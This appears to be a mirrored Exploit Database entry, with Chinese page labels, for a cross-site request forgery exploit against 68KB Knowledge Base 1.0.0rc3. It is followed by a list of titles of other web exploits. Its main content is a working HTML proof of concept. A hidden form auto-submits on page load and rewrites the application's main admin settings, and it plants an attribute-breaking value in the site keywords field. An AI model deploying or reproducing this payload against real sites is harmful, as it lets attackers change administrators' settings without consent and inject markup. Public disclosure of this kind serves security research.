68KB Knowledge Base 1.0.0rc3 – Cross-Site Request Forgery (Edit Main Settings)

Exploit Database
9 阅读

作者： Jelmer de Hen

日期： 2010-04-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12022/

Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms['edit_settings'].submit()">
<form name="edit_settings" action="http://server/index.php/admin/settings/main" method="post">
<input type=hidden name="site_name" value="Your Site">
<input type=hidden name="site_keywords" value='">escapable'>
<input type=hidden name="site_description" value="">
<input type=hidden name="site_email" value="a@a.com">
<input type=hidden name="max_search" value="5">
<input type=hidden name="comments" value="5">
<input type=hidden name="cache_time" value="0">
</form>
</body>
</html>

last Exploits
68KB Knowledge Base 1.0.0rc3 – Cross-Site Request Forgery (Edit Main Settings)的更多信息

Sitecore CMS 8.2 – Cross-Site Scripting / Arbitrary File Disclosure：
Snipe Gallery 3.1 – ‘image.php?cfg_admin_path’ Remote File Inclusion：
MyBB KingChat Plugin – Persistent Cross-Site Scripting：
Kasseler CMS 2.0.5 – ‘index.php’ Cross-Site Scripting：
Joomla! Convert Forms version 2.0.3 – Formula Injection (CSV Injection)：
HaPe PKH 1.1 – ‘id’ SQL Injection：
Joomla! Component J2Store < 3.3.7 - SQL Injection：
iGaming CMS – Multiple SQL Injections：